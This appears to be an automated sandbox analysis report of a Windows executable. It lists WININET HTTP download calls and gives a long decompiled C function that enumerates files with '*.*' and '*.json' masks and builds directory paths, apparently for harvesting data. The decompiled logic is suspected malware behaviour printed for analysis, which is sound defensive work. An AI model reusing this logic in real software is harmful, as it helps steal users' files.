0x00000000
0x00000000
0x0040b494
0x0040b494
0x0040b494
0x0040b49a
0x0040b49c
0x00000000
0x00000000
0x0040b49e
0x0040b4ab
0x0040b4b2
0x0040b4b9
0x0040b4c0
0x0040b4c2
0x0040b4c6
0x0040b4d4
0x0040b4d8
0x0040b4f6
0x0040b4fc
0x0040b4fe
0x00000000
0x00000000
0x00000000
0x0040b4fe
0x00000000
0x0040b494
0x0040b3d1
0x0040b3dc
0x0040b3e9
0x0040b3f6
0x0040b403
0x0040b410
0x0040b41d
0x0040b42a
0x0040b437
0x0040b441
0x0040b5ab
0x0040b5b0
0x0040b5b0
0x0040b38f
0x0040b355

APIs

__EH_prolog3_GS.LIBCMT ref: 0040ABE8

Part of subcall function 004049CF: _strlen.LIBCMT ref: 004049E6

Part of subcall function 0040AA82: _strlen.LIBCMT ref: 0040AA96
Part of subcall function 0040AA82: _strlen.LIBCMT ref: 0040AAE7

Part of subcall function 00404A22: _memmove.LIBCMT ref: 00404A3E

Part of subcall function 00404A66: _memmove.LIBCMT ref: 00404A86

_strlen.LIBCMT ref: 0040ACC3

Part of subcall function 0040CDFB: _memcmp.LIBCMT ref: 0040CE1F

_strlen.LIBCMT ref: 0040ACF0
_strlen.LIBCMT ref: 0040AE7E
_strlen.LIBCMT ref: 0040AF30
_strlen.LIBCMT ref: 0040B0D6
DeleteUrlCacheEntry.WININET(?), ref: 0040B254
DeleteUrlCacheEntry.WININET(?), ref: 0040B266
InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040B28C
StrCmpCA.SHLWAPI(?,https), ref: 0040B2FB
InternetConnectA.WININET(00000400,?,?,00000000,00000000,00000003,-04800000,00000000), ref: 0040B347
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,00000000,-04800000,00000000), ref: 0040B381
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040B39A
HttpQueryInfoA.WININET(000000FF,00000013,?,?,00000000), ref: 0040B3C3

Strings

http://, xrefs: 0040ACEA, 0040ACEF, 0040ACF6
https, xrefs: 0040B2F5
https://, xrefs: 0040ACBD, 0040ACC2, 0040ACC9
/, xrefs: 0040AD2E
@, xrefs: 0040B0B2
GET, xrefs: 0040B376
ERROR, xrefs: 0040B3D7

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _strlen$Http$CacheDeleteEntryInternetOpenRequest_memmove$ConnectH_prolog3_InfoQuerySend_memcmp
String ID: /$@$ERROR$GET$http://$https$https://
API String ID: 3256607817-1375800861
Opcode ID: 9c763bcc88816af42e5b414ca519f6addec4a1afcc7ad76f4679912139e5b8c9
Instruction ID: 5db40e69fcbad0e3ba5f16448d0424c79bc041e8b96667772b59757ce943316a
Opcode Fuzzy Hash: 9c763bcc88816af42e5b414ca519f6addec4a1afcc7ad76f4679912139e5b8c9
Instruction Fuzzy Hash: 304242B1D022699EEB20DB24CD45BEEB778EF41354F1042EAA509B21D2DB741F85CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040D8F4 Relevance: 46.2, APIs: 23, Strings: 3, Instructions: 690
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040D8F4(void* __ebx, signed int __edi, void* __esi, void* __eflags) {
				intOrPtr _t192;
				CHAR* _t427;
				CHAR* _t428;
				CHAR* _t429;
				CHAR* _t430;
				CHAR* _t434;
				CHAR* _t435;
				CHAR* _t436;
				CHAR* _t437;
				signed int _t442;
				char* _t444;
				void* _t447;
				void* _t448;
				intOrPtr _t449;
				intOrPtr _t450;
				intOrPtr _t451;
				intOrPtr _t452;
				intOrPtr _t453;
				intOrPtr _t454;
				intOrPtr _t455;
				intOrPtr _t456;
				intOrPtr _t457;
				intOrPtr _t458;
				intOrPtr _t459;
				intOrPtr _t460;
				intOrPtr _t461;
				intOrPtr _t462;
				intOrPtr _t463;
				intOrPtr _t464;
				intOrPtr _t465;
				intOrPtr _t466;
				intOrPtr _t467;
				intOrPtr _t468;
				intOrPtr _t469;
				intOrPtr _t470;
				intOrPtr _t471;
				intOrPtr _t472;
				intOrPtr _t473;
				intOrPtr _t474;
				intOrPtr _t475;
				intOrPtr _t476;
				intOrPtr _t477;
				intOrPtr _t478;
				intOrPtr _t479;
				intOrPtr _t480;
				intOrPtr _t481;
				intOrPtr _t482;
				intOrPtr _t483;
				intOrPtr _t484;
				intOrPtr _t485;
				intOrPtr _t486;
				intOrPtr _t487;
				intOrPtr _t488;
				intOrPtr _t489;
				intOrPtr _t490;
				intOrPtr _t491;
				intOrPtr _t492;
				intOrPtr _t493;
				intOrPtr _t494;
				intOrPtr _t495;
				intOrPtr _t496;
				intOrPtr _t497;
				intOrPtr _t498;
				intOrPtr _t499;
				intOrPtr _t500;
				intOrPtr _t501;
				intOrPtr _t502;
				intOrPtr _t503;
				intOrPtr _t504;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				intOrPtr _t508;
				intOrPtr _t509;
				intOrPtr _t510;
				intOrPtr _t511;
				intOrPtr _t512;
				intOrPtr _t513;
				intOrPtr _t514;
				intOrPtr _t515;
				intOrPtr _t516;
				intOrPtr _t517;
				intOrPtr _t518;
				intOrPtr _t519;
				intOrPtr _t520;
				intOrPtr _t521;
				intOrPtr _t522;

				E00423679(E00434462, __ebx, __edi, __esi);
				_t192 =  *0x4472ac; // 0x0
				_t449 = _t448 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x544)) = _t449;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 0x20)) = _t192;
				E004049CF(_t449,  *0x446d10);
				_t450 = _t449 - 0x1c;
				 *(_t447 - 4) = 0;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t450;
				E004049CF(_t450,  *0x446cbc);
				_t451 = _t450 - 0x1c;
				 *(_t447 - 4) = 1;
				 *((intOrPtr*)(_t447 - 0x540)) = _t451;
				E004049CF(_t451,  *0x446ef8);
				_t442 = __edi | 0xffffffff;
				_t537 = _t442;
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t442); // executed
				_t452 = _t451 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t452;
				E004049CF(_t452, "*.*");
				_t453 = _t452 - 0x1c;
				 *(_t447 - 4) = 2;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t453;
				E004049CF(_t453,  *0x446dfc);
				_t454 = _t453 - 0x1c;
				 *(_t447 - 4) = 3;
				 *((intOrPtr*)(_t447 - 0x544)) = _t454;
				E004049CF(_t454,  *0x446ec4);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t442); // executed
				_t455 = _t454 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t455;
				E004049CF(_t455, "*.*");
				_t456 = _t455 - 0x1c;
				 *(_t447 - 4) = 4;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t456;
				E004049CF(_t456,  *0x446ca8);
				_t457 = _t456 - 0x1c;
				 *(_t447 - 4) = 5;
				 *((intOrPtr*)(_t447 - 0x544)) = _t457;
				E004049CF(_t457,  *0x446c90);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537); // executed
				_t458 = _t457 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t458;
				E004049CF(_t458,  *0x447178);
				 *(_t447 - 4) = 6;
				_t459 = _t458 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t459;
				E004049CF(_t459,  *0x446bf8);
				_t460 = _t459 - 0x1c;
				 *(_t447 - 4) = 7;
				 *((intOrPtr*)(_t447 - 0x544)) = _t460;
				E004049CF(_t460,  *0x447068);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537); // executed
				_t461 = _t460 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t461;
				E004049CF(_t461,  *0x446dd4);
				_t462 = _t461 - 0x1c;
				 *(_t447 - 4) = 8;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t462;
				E004049CF(_t462,  *0x446bf8);
				_t463 = _t462 - 0x1c;
				 *(_t447 - 4) = 9;
				 *((intOrPtr*)(_t447 - 0x544)) = _t463;
				E004049CF(_t463,  *0x447068);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537); // executed
				_t464 = _t463 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t464;
				E004049CF(_t464,  *0x446f0c);
				_t465 = _t464 - 0x1c;
				 *(_t447 - 4) = 0xa;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t465;
				E004049CF(_t465,  *0x446bf8);
				_t466 = _t465 - 0x1c;
				 *(_t447 - 4) = 0xb;
				 *((intOrPtr*)(_t447 - 0x544)) = _t466;
				E004049CF(_t466,  *0x446c14);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537); // executed
				_t467 = _t466 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t467;
				E004049CF(_t467,  *0x447128);
				_t468 = _t467 - 0x1c;
				 *(_t447 - 4) = 0xc;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t468;
				E004049CF(_t468,  *0x446bf8);
				_t469 = _t468 - 0x1c;
				 *(_t447 - 4) = 0xd;
				 *((intOrPtr*)(_t447 - 0x544)) = _t469;
				E004049CF(_t469,  *0x446c14);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537); // executed
				_t470 = _t469 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t470;
				E004049CF(_t470,  *0x447148);
				_t471 = _t470 - 0x1c;
				 *(_t447 - 4) = 0xe;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t471;
				E004049CF(_t471,  *0x446bf8);
				_t472 = _t471 - 0x1c;
				 *(_t447 - 4) = 0xf;
				 *((intOrPtr*)(_t447 - 0x544)) = _t472;
				E004049CF(_t472,  *0x446c14);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537);
				_t473 = _t472 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t473;
				E004049CF(_t473,  *0x44710c);
				_t474 = _t473 - 0x1c;
				 *(_t447 - 4) = 0x10;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t474;
				E004049CF(_t474,  *0x447158);
				_t475 = _t474 - 0x1c;
				 *(_t447 - 4) = 0x11;
				 *((intOrPtr*)(_t447 - 0x544)) = _t475;
				E004049CF(_t475,  *0x446fe0);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537); // executed
				_t476 = _t475 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t476;
				E004049CF(_t476,  *0x446fc8);
				_t477 = _t476 - 0x1c;
				 *(_t447 - 4) = 0x12;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t477;
				E004049CF(_t477,  *0x4471fc);
				_t478 = _t477 - 0x1c;
				 *(_t447 - 4) = 0x13;
				 *((intOrPtr*)(_t447 - 0x544)) = _t478;
				E004049CF(_t478,  *0x446d3c);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537); // executed
				_t479 = _t478 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t479;
				E004049CF(_t479,  *0x446bc0);
				 *(_t447 - 4) = 0x14;
				_t480 = _t479 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t480;
				E004049CF(_t480,  *0x446eb0);
				_t481 = _t480 - 0x1c;
				 *(_t447 - 4) = 0x15;
				 *((intOrPtr*)(_t447 - 0x544)) = _t481;
				E004049CF(_t481,  *0x4470f4);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537); // executed
				_t482 = _t481 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t482;
				E004049CF(_t482, "*.*");
				_t483 = _t482 - 0x1c;
				 *(_t447 - 4) = 0x16;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t483;
				E004049CF(_t483,  *0x446ae8);
				_t484 = _t483 - 0x1c;
				 *(_t447 - 4) = 0x17;
				 *((intOrPtr*)(_t447 - 0x544)) = _t484;
				E004049CF(_t484,  *0x4471ac);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537); // executed
				_t485 = _t484 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t485;
				E004049CF(_t485,  *0x447144);
				_t486 = _t485 - 0x1c;
				 *(_t447 - 4) = 0x18;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t486;
				E004049CF(_t486,  *0x446d70);
				_t487 = _t486 - 0x1c;
				 *(_t447 - 4) = 0x19;
				 *((intOrPtr*)(_t447 - 0x544)) = _t487;
				E004049CF(_t487,  *0x446bb4);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537); // executed
				_t488 = _t487 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t488;
				E004049CF(_t488,  *0x446a5c);
				_t489 = _t488 - 0x1c;
				 *(_t447 - 4) = 0x1a;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t489;
				E004049CF(_t489,  *0x446d70);
				_t490 = _t489 - 0x1c;
				 *(_t447 - 4) = 0x1b;
				 *((intOrPtr*)(_t447 - 0x544)) = _t490;
				E004049CF(_t490,  *0x446bb4);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537); // executed
				_t491 = _t490 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t491;
				E004049CF(_t491,  *0x446b54);
				_t492 = _t491 - 0x1c;
				 *(_t447 - 4) = 0x1c;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t492;
				E004049CF(_t492,  *0x446d70);
				_t493 = _t492 - 0x1c;
				 *(_t447 - 4) = 0x1d;
				 *((intOrPtr*)(_t447 - 0x544)) = _t493;
				E004049CF(_t493,  *0x446bb4);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537);
				_t494 = _t493 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t494;
				E004049CF(_t494,  *0x446ff8);
				_t495 = _t494 - 0x1c;
				 *(_t447 - 4) = 0x1e;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t495;
				E004049CF(_t495,  *0x446d70);
				_t496 = _t495 - 0x1c;
				 *(_t447 - 4) = 0x1f;
				 *((intOrPtr*)(_t447 - 0x544)) = _t496;
				E004049CF(_t496,  *0x446bb4);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537);
				_t497 = _t496 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t497;
				E004049CF(_t497,  *0x446c08);
				_t498 = _t497 - 0x1c;
				 *(_t447 - 4) = 0x20;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t498;
				E004049CF(_t498,  *0x446d70);
				_t499 = _t498 - 0x1c;
				 *(_t447 - 4) = 0x21;
				 *((intOrPtr*)(_t447 - 0x544)) = _t499;
				E004049CF(_t499,  *0x446bb4);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537);
				_t500 = _t499 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t500;
				E004049CF(_t500,  *0x447140);
				_t501 = _t500 - 0x1c;
				 *(_t447 - 4) = 0x22;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t501;
				E004049CF(_t501,  *0x447208);
				_t502 = _t501 - 0x1c;
				 *(_t447 - 4) = 0x23;
				 *((intOrPtr*)(_t447 - 0x544)) = _t502;
				E004049CF(_t502,  *0x4471f8);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537); // executed
				_t503 = _t502 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t503;
				E004049CF(_t503,  *0x446fb0);
				_t504 = _t503 - 0x1c;
				 *(_t447 - 4) = 0x24;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t504;
				E004049CF(_t504,  *0x447208);
				_t505 = _t504 - 0x1c;
				 *(_t447 - 4) = 0x25;
				 *((intOrPtr*)(_t447 - 0x544)) = _t505;
				E004049CF(_t505,  *0x4471f8);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537); // executed
				_t506 = _t505 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t506;
				E004049CF(_t506,  *0x446c50);
				_t507 = _t506 - 0x1c;
				 *(_t447 - 4) = 0x26;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t507;
				E004049CF(_t507,  *0x447208);
				_t508 = _t507 - 0x1c;
				 *(_t447 - 4) = 0x27;
				 *((intOrPtr*)(_t447 - 0x544)) = _t508;
				E004049CF(_t508,  *0x4471f8);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537);
				_t509 = _t508 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t509;
				E004049CF(_t509,  *0x447180);
				_t510 = _t509 - 0x1c;
				 *(_t447 - 4) = 0x28;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t510;
				E004049CF(_t510,  *0x446b30);
				_t511 = _t510 - 0x1c;
				 *(_t447 - 4) = 0x29;
				 *((intOrPtr*)(_t447 - 0x544)) = _t511;
				E004049CF(_t511,  *0x446c10);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537); // executed
				_t512 = _t511 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t512;
				E004049CF(_t512,  *0x446e6c);
				_t513 = _t512 - 0x1c;
				 *(_t447 - 4) = 0x2a;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t513;
				E004049CF(_t513,  *0x446b30);
				_t514 = _t513 - 0x1c;
				 *(_t447 - 4) = 0x2b;
				 *((intOrPtr*)(_t447 - 0x544)) = _t514;
				E004049CF(_t514,  *0x446c10);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537); // executed
				_t515 = _t514 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t515;
				E004049CF(_t515,  *0x446c54);
				_t516 = _t515 - 0x1c;
				 *(_t447 - 4) = 0x2c;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t516;
				E004049CF(_t516,  *0x446f60);
				_t517 = _t516 - 0x1c;
				 *(_t447 - 4) = 0x2d;
				 *((intOrPtr*)(_t447 - 0x544)) = _t517;
				E004049CF(_t517,  *0x446f00);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537); // executed
				_t518 = _t517 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t518;
				E004049CF(_t518, "*.*");
				_t519 = _t518 - 0x1c;
				 *(_t447 - 4) = 0x2e;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t519;
				E004049CF(_t519,  *0x446e48);
				_t520 = _t519 - 0x1c;
				 *(_t447 - 4) = 0x2f;
				 *((intOrPtr*)(_t447 - 0x544)) = _t520;
				E004049CF(_t520,  *0x446b50);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537); // executed
				_t521 = _t520 - 0x1c;
				 *((intOrPtr*)(_t447 - 0x540)) = _t521;
				E004049CF(_t521, "*.json");
				_t522 = _t521 - 0x1c;
				 *(_t447 - 4) = 0x30;
				 *((intOrPtr*)(_t447 - 0x53c)) = _t522;
				E004049CF(_t522,  *0x4470ac);
				_t523 = _t522 - 0x1c;
				 *(_t447 - 4) = 0x31;
				 *((intOrPtr*)(_t447 - 0x544)) = _t522 - 0x1c;
				E004049CF(_t523,  *0x446ee0);
				 *(_t447 - 4) = _t442;
				E0040D114(0, _t442, __esi, _t537);
				_t434 =  *0x446b3c; // 0x6ed4c8
				_t427 =  *0x446c80; // 0x6ecd00
				E0040D624(_t427, _t434, _t537,  *0x446a48,  *((intOrPtr*)(__esi + 0x20)), 1);
				_t435 =  *0x446a88; // 0x6ed738
				_t428 =  *0x447244; // 0x6ed618
				E0040D624(_t428, _t435, _t537,  *0x446ed4,  *((intOrPtr*)(__esi + 0x20)), 0);
				_t436 =  *0x446a88; // 0x6ed738
				_t429 =  *0x446b1c; // 0x6ed768
				E0040D624(_t429, _t436, _t537,  *0x446d4c,  *((intOrPtr*)(__esi + 0x20)), 0);
				_t437 =  *0x446a88; // 0x6ed738
				_t430 =  *0x447200; // 0x6eb208
				E0040D624(_t430, _t437, _t537,  *0x447110,  *((intOrPtr*)(__esi + 0x20)), 0); // executed
				E0041F6B0(_t447 - 0x328, 0, 0x104);
				E0041F6B0(_t447 - 0x538, 0, 0x104);
				E0041F6B0(_t447 - 0x118, 0, 0x104);
				E0041F6B0(_t447 - 0x430, 0, 0x104);
				E0041F6B0(_t447 - 0x220, 0, 0x104);
				_t444 = "\\";
				 *0x4474e0(_t447 - 0x328, _t444, __esi, 0, __esi, 1, __esi, 0, __esi, 1, __esi, 1, __esi, 0, __esi, 0, __esi, 0, __esi, 0, __esi, 0, __esi, 0, __esi, 0, __esi, 0, __esi, 0, __esi, 0, __esi, 0, __esi, 0, __esi, 0, __esi, 0, __esi, 0, __esi, 0, __esi, 0, __esi, 0, __esi, 0, __esi, 0, 0x53c);
				 *0x4474e0(_t447 - 0x328,  *0x446c24);
				 *0x4474e0(_t447 - 0x328, _t444);
				 *0x4474e0(_t447 - 0x118,  *0x446c24);
				 *0x4474e0(_t447 - 0x118, _t444);
				 *0x4474e0(_t447 - 0x118,  *0x446d24);
				 *0x4474e0(_t447 - 0x118, _t444);
				 *0x4474e0(_t447 - 0x118,  *0x447008);
				 *0x4474e0(_t447 - 0x538, _t444);
				 *0x4474e0(_t447 - 0x538, _t447 - 0x118);
				 *0x4474e0(_t447 - 0x538, _t444);
				 *0x4474e0(_t447 - 0x220,  *0x446c24);
				 *0x4474e0(_t447 - 0x220, _t444);
				 *0x4474e0(_t447 - 0x220,  *0x446efc);
				 *0x4474e0(_t447 - 0x430, _t444);
				 *0x4474e0(_t447 - 0x430, _t447 - 0x220);
				 *0x4474e0(_t447 - 0x430, _t444);
				_t445 = "*.*";
				E0040D624(_t447 - 0x328, "*.*", _t537,  *0x446c24,  *((intOrPtr*)(__esi + 0x20)), 0); // executed
				E0040D624(_t447 - 0x538, _t445, _t537, _t447 - 0x118,  *((intOrPtr*)(__esi + 0x20)), 0); // executed
				E0040D624(_t447 - 0x430, _t445, _t537, _t447 - 0x220,  *((intOrPtr*)(__esi + 0x20)), 0); // executed
				return E004236C3(0, _t445, __esi);
			}

0x0040d8fe
0x0040d903
0x0040d908
0x0040d90d
0x0040d91b
0x0040d91e
0x0040d921
0x0040d926
0x0040d929
0x0040d92e
0x0040d93a
0x0040d93f
0x0040d942
0x0040d948
0x0040d954
0x0040d95a
0x0040d95a
0x0040d95e
0x0040d961
0x0040d966
0x0040d96b
0x0040d976
0x0040d97b
0x0040d97e
0x0040d987
0x0040d993
0x0040d998
0x0040d99b
0x0040d9a1
0x0040d9ad
0x0040d9b4
0x0040d9b7
0x0040d9bc
0x0040d9c1
0x0040d9cc
0x0040d9d1
0x0040d9d4
0x0040d9dd
0x0040d9e9
0x0040d9ee
0x0040d9f1
0x0040d9f7
0x0040da03
0x0040da0a
0x0040da0d
0x0040da12
0x0040da17
0x0040da23
0x0040da28
0x0040da2f
0x0040da34
0x0040da40
0x0040da45
0x0040da48
0x0040da4e
0x0040da5a
0x0040da61
0x0040da64
0x0040da69
0x0040da6e
0x0040da7a
0x0040da7f
0x0040da82
0x0040da8b
0x0040da97
0x0040da9c
0x0040da9f
0x0040daa5
0x0040dab1
0x0040dab8
0x0040dabb
0x0040dac0
0x0040dac5
0x0040dad1
0x0040dad6
0x0040dad9
0x0040dae2
0x0040daee
0x0040daf3
0x0040daf6
0x0040dafc
0x0040db08
0x0040db0f
0x0040db12
0x0040db17
0x0040db1c
0x0040db28
0x0040db2d
0x0040db30
0x0040db39
0x0040db45
0x0040db4a
0x0040db4d
0x0040db53
0x0040db5f
0x0040db66
0x0040db69
0x0040db6e
0x0040db73
0x0040db7f
0x0040db84
0x0040db87
0x0040db90
0x0040db9c
0x0040dba1
0x0040dba4
0x0040dbaa
0x0040dbb6
0x0040dbbd
0x0040dbc0
0x0040dbc5
0x0040dbca
0x0040dbd6
0x0040dbdb
0x0040dbde
0x0040dbe7
0x0040dbf3
0x0040dbf8
0x0040dbfb
0x0040dc01
0x0040dc0d
0x0040dc14
0x0040dc17
0x0040dc1c
0x0040dc21
0x0040dc2d
0x0040dc32
0x0040dc35
0x0040dc3e
0x0040dc4a
0x0040dc4f
0x0040dc52
0x0040dc58
0x0040dc64
0x0040dc6b
0x0040dc6e
0x0040dc73
0x0040dc78
0x0040dc84
0x0040dc89
0x0040dc90
0x0040dc95
0x0040dca1
0x0040dca6
0x0040dca9
0x0040dcaf
0x0040dcbb
0x0040dcc2
0x0040dcc5
0x0040dcca
0x0040dccf
0x0040dcda
0x0040dcdf
0x0040dce2
0x0040dceb
0x0040dcf7
0x0040dcfc
0x0040dcff
0x0040dd05
0x0040dd11
0x0040dd18
0x0040dd1b
0x0040dd20
0x0040dd25
0x0040dd31
0x0040dd36
0x0040dd39
0x0040dd42
0x0040dd4e
0x0040dd53
0x0040dd56
0x0040dd5c
0x0040dd68
0x0040dd6f
0x0040dd72
0x0040dd77
0x0040dd7c
0x0040dd88
0x0040dd8d
0x0040dd90
0x0040dd99
0x0040dda5
0x0040ddaa
0x0040ddad
0x0040ddb3
0x0040ddbf
0x0040ddc6
0x0040ddc9
0x0040ddce
0x0040ddd3
0x0040dddf
0x0040dde4
0x0040dde7
0x0040ddf0
0x0040ddfc
0x0040de01
0x0040de04
0x0040de0a
0x0040de16
0x0040de1d
0x0040de20
0x0040de25
0x0040de2a
0x0040de36
0x0040de3b
0x0040de3e
0x0040de47
0x0040de53
0x0040de58
0x0040de5b
0x0040de61
0x0040de6d
0x0040de74
0x0040de77
0x0040de7c
0x0040de81
0x0040de8d
0x0040de92
0x0040de95
0x0040de9e
0x0040deaa
0x0040deaf
0x0040deb2
0x0040deb8
0x0040dec4
0x0040decb
0x0040dece
0x0040ded3
0x0040ded8
0x0040dee4
0x0040dee9
0x0040deec
0x0040def5
0x0040df01
0x0040df06
0x0040df09
0x0040df0f
0x0040df1b
0x0040df22
0x0040df25
0x0040df2a
0x0040df2f
0x0040df3b
0x0040df40
0x0040df43
0x0040df4c
0x0040df58
0x0040df5d
0x0040df60
0x0040df66
0x0040df72
0x0040df79
0x0040df7c
0x0040df81
0x0040df86
0x0040df92
0x0040df97
0x0040df9a
0x0040dfa3
0x0040dfaf
0x0040dfb4
0x0040dfb7
0x0040dfbd
0x0040dfc9
0x0040dfd0
0x0040dfd3
0x0040dfd8
0x0040dfdd
0x0040dfe9
0x0040dfee
0x0040dff1
0x0040dffa
0x0040e006
0x0040e00b
0x0040e00e
0x0040e014
0x0040e020
0x0040e028
0x0040e02b
0x0040e030
0x0040e035
0x0040e041
0x0040e046
0x0040e049
0x0040e052
0x0040e05e
0x0040e063
0x0040e066
0x0040e06c
0x0040e078
0x0040e080
0x0040e083
0x0040e088
0x0040e08d
0x0040e099
0x0040e09e
0x0040e0a1
0x0040e0aa
0x0040e0b6
0x0040e0bb
0x0040e0be
0x0040e0c4
0x0040e0d0
0x0040e0d7
0x0040e0da
0x0040e0df
0x0040e0e4
0x0040e0ef
0x0040e0f4
0x0040e0f7
0x0040e100
0x0040e10c
0x0040e111
0x0040e114
0x0040e11a
0x0040e126
0x0040e12e
0x0040e131
0x0040e136
0x0040e13b
0x0040e146
0x0040e14b
0x0040e14e
0x0040e157
0x0040e163
0x0040e168
0x0040e16b
0x0040e171
0x0040e17d
0x0040e184
0x0040e187
0x0040e18c
0x0040e192
0x0040e1a3
0x0040e1a8
0x0040e1ae
0x0040e1c1
0x0040e1c6
0x0040e1cc
0x0040e1df
0x0040e1e4
0x0040e1ea
0x0040e1fd
0x0040e213
0x0040e224
0x0040e235
0x0040e246
0x0040e257
0x0040e25f
0x0040e26c
0x0040e27f
0x0040e28d
0x0040e2a0
0x0040e2ae
0x0040e2c1
0x0040e2cf
0x0040e2e2
0x0040e2f0
0x0040e304
0x0040e312
0x0040e325
0x0040e333
0x0040e346
0x0040e354
0x0040e368
0x0040e376
0x0040e380
0x0040e393
0x0040e3ae
0x0040e3c9
0x0040e3d9

APIs

__EH_prolog3_GS.LIBCMT ref: 0040D8FE

Part of subcall function 004049CF: _strlen.LIBCMT ref: 004049E6

Part of subcall function 0040D114: __EH_prolog3_GS.LIBCMT ref: 0040D11E
Part of subcall function 0040D114: _strlen.LIBCMT ref: 0040D15F

Part of subcall function 0040D114: GetFileAttributesW.KERNELBASE(00000000,?,?,00000001,00000000,00000001,00000000,00000001,00000000), ref: 0040D2ED
Part of subcall function 0040D114: _memset.LIBCMT ref: 0040D376
Part of subcall function 0040D114: lstrcat.KERNEL32(00000001,0043D134), ref: 0040D38B
Part of subcall function 0040D114: lstrcat.KERNEL32(?,0043F55C), ref: 0040D39D
Part of subcall function 0040D114: lstrcat.KERNEL32(?,0043F560), ref: 0040D3AF
Part of subcall function 0040D114: lstrcat.KERNEL32(?,0043F564), ref: 0040D3C1
Part of subcall function 0040D114: lstrcat.KERNEL32(?,0043F564), ref: 0040D3D3
Part of subcall function 0040D114: lstrcat.KERNEL32(?,0043F568), ref: 0040D3E5
Part of subcall function 0040D114: lstrcat.KERNEL32(?,0043F56C), ref: 0040D3F7
